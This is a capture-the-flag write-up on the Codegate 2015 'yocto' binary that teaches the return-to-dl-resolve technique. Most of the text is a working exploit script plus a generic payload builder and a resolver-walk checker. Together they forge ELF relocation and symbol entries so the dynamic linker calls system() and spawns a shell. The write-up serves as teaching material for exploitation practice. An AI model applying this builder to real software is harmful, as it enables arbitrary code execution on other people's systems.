cdor1's lab
Codegate 2015 yocto
Afterword: I picked up a new technique, RTDL (return-to-dl-resolve)!
※ Based on the write-ups by jinmo123 (진용휘) and pwn3r (권혁).
from pwn import p32   # pwntools: p32() packs a 32-bit little-endian value
import sys

# Addresses taken from the (non-PIE, i386) yocto binary
buf            = 0x080495c0  # .bss: where our input lands and where the fake structures live
strtab         = 0x080481fc  # .dynstr: the symbol-name string table
symtab         = 0x0804818c  # .dynsym: Elf32_Sym entries, 16 bytes each
jmprel         = 0x08048270  # .rel.plt: Elf32_Rel entries, 8 bytes each
dynamic_linker = 0x080482a0  # PLT0 stub: push link_map; jmp *_dl_runtime_resolve
target         = 0x08049610  # writable word the resolver overwrites with the address of system()

# Layout inside buf (offsets from buf):
#   +20  Elf32_Rel  {r_offset = target, r_info = (0x146 << 8) | R_386_JMP_SLOT}
#   +28  "system\0"  the name the resolver will look up
#   +44  Elf32_Sym  {st_name = offset of "system" from strtab, rest = still-zero .bss}
# 0x146 is the index for which symtab + 0x146*16 == buf + 44, hence the 9 bytes of padding.
r_addr   = buf + 20           # fake Elf32_Rel
sys_addr = r_addr + 8         # "system\0"
r_offset = r_addr - jmprel    # byte offset of the fake reloc from .rel.plt: the resolver's argument
string   = sys_addr - strtab  # st_name: offset of "system" from .dynstr
assert symtab + 0x146 * 16 == buf + 44

# First 20 bytes: the '.'-separated decimal fields the binary parses (reloc offset,
# then the PLT0 address to jump to), followed by ';sh;' so that system() run on this
# buffer drops into sh once the leading garbage command fails.
payload  = b'.' + str(r_offset).encode() + b'.' + str(dynamic_linker).encode()
payload += b';sh;'
payload  = payload.ljust(20, b'A')
payload += p32(target)        # Elf32_Rel.r_offset
payload += p32(0x14607)       # Elf32_Rel.r_info: symbol index 0x146, type 7 (R_386_JMP_SLOT)
payload += b'system\x00'      # at buf+28
payload += b'A' * 9           # pad so Elf32_Sym.st_name lands at buf+44
payload += p32(string)        # Elf32_Sym.st_name; st_value/st_size/st_info/st_other/st_shndx stay 0

sys.stdout.buffer.write(payload + b'\n')   # e.g. python3 exploit.py | ./yocto
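The script above hard-codes one layout. As an added example (mine, not code from the write-up or from the referenced documents), here is the same construction as a reusable builder that computes the padding and the symbol index from the section addresses, plus a check that walks the same pointer chain _dl_fixup walks, but over the payload image, so a mis-aligned fake Elf32_Sym or an out-of-buffer read is caught before the binary crashes. The addresses in YOCTO are the ones listed in the script; the function names build_fake_reloc, walk_like_dl_fixup and yocto_payload are my own; the structure sizes and R_386_JMP_SLOT = 7 come from the i386 ELF ABI.

```python
import struct

R_386_JMP_SLOT = 7
REL_SIZE = 8    # sizeof(Elf32_Rel)
SYM_SIZE = 16   # sizeof(Elf32_Sym)


def build_fake_reloc(buf, rel_off, symtab, strtab, jmprel, target, name=b"system"):
    """Lay out fake Elf32_Rel + name + Elf32_Sym for ret2dl-resolve, to be
    written at buf+rel_off.  Returns (tail, reloc_offset, sym_off).

    The resolver finds the symbol as symtab + 16*index, so the fake Elf32_Sym
    must sit at an address congruent to symtab mod 16; the padding after the
    name is computed to make that true.  reloc_offset is a byte offset on
    i386 (jmprel + reloc_offset), so the fake Elf32_Rel needs no alignment.
    """
    rel_addr = buf + rel_off
    name_addr = rel_addr + REL_SIZE
    after_name = name_addr + len(name) + 1
    pad = (symtab - after_name) % SYM_SIZE              # 0..15 bytes
    sym_addr = after_name + pad
    sym_index, rem = divmod(sym_addr - symtab, SYM_SIZE)
    assert rem == 0 and 0 < sym_index < (1 << 24), "index must fit in r_info's upper 24 bits"

    r_info = (sym_index << 8) | R_386_JMP_SLOT
    tail = struct.pack("<II", target, r_info)          # Elf32_Rel {r_offset, r_info}
    tail += name + b"\x00"
    tail += b"A" * pad
    # Elf32_Sym {st_name, st_value, st_size, st_info, st_other, st_shndx}.
    # st_other = 0 (STV_DEFAULT) and st_shndx = 0 (SHN_UNDEF) make _dl_fixup do a
    # by-name lookup instead of trusting st_value; 0x12 = STB_GLOBAL | STT_FUNC.
    tail += struct.pack("<IIIBBH", name_addr - strtab, 0, 0, 0x12, 0, 0)
    return tail, rel_addr - jmprel, sym_addr - buf


def walk_like_dl_fixup(buf, image, symtab, strtab, jmprel, reloc_offset):
    """Follow the pointer chain _dl_fixup follows, over our in-memory image of
    the buffer at `buf`, and return what the resolver would see:
    (r_offset, r_type, symbol_name).  Raises ValueError if any read leaves
    the image, the usual reason such a payload crashes instead of resolving."""
    def read(addr, n):
        off = addr - buf
        if not 0 <= off <= len(image) - n:
            raise ValueError("read of %d bytes at %#x leaves the buffer" % (n, addr))
        return image[off:off + n]

    def read_cstr(addr):
        end = addr
        while read(end, 1) != b"\x00":
            end += 1
        return read(addr, end - addr)

    r_offset, r_info = struct.unpack("<II", read(jmprel + reloc_offset, REL_SIZE))
    sym_addr = symtab + (r_info >> 8) * SYM_SIZE
    st_name, _val, _size, _info, st_other, _shndx = struct.unpack(
        "<IIIBBH", read(sym_addr, SYM_SIZE))
    assert st_other & 3 == 0, "non-default visibility: _dl_fixup would skip the lookup"
    return r_offset, r_info & 0xff, read_cstr(strtab + st_name)


# Addresses from the yocto script above (i386, non-PIE).
YOCTO = dict(buf=0x080495c0, symtab=0x0804818c, strtab=0x080481fc,
             jmprel=0x08048270, target=0x08049610)
PLT0 = 0x080482a0


def yocto_payload():
    """Rebuild the write-up's payload with the generic builder and check it."""
    tail, reloc_offset, sym_off = build_fake_reloc(rel_off=20, **YOCTO)
    head = b".%d.%d;sh;" % (reloc_offset, PLT0)      # the 20-byte prefix the binary parses
    assert len(head) <= 20
    payload = head.ljust(20, b"A") + tail
    seen = walk_like_dl_fixup(YOCTO["buf"], payload, YOCTO["symtab"],
                              YOCTO["strtab"], YOCTO["jmprel"], reloc_offset)
    return payload, reloc_offset, sym_off, seen


if __name__ == "__main__":
    import sys
    payload, _, _, seen = yocto_payload()
    sys.stderr.write("resolver would write %#x <- %r (type %d)\n" % (seen[0], seen[2], seen[1]))
    sys.stdout.buffer.write(payload + b"\n")
```

With the yocto addresses the builder lands on the same numbers the script hard-codes: reloc offset 4964, symbol index 0x146, nine bytes of padding, st_name 5088. Two caveats for other targets: on x86_64 the resolver argument is a relocation index rather than a byte offset, so the Elf64_Rela must be 24-byte aligned relative to .rela.plt; and when the binary has DT_VERSYM, _dl_fixup also indexes the version table with the same symbol index, so that slot must be readable and hold a sane version index, which this check does not model.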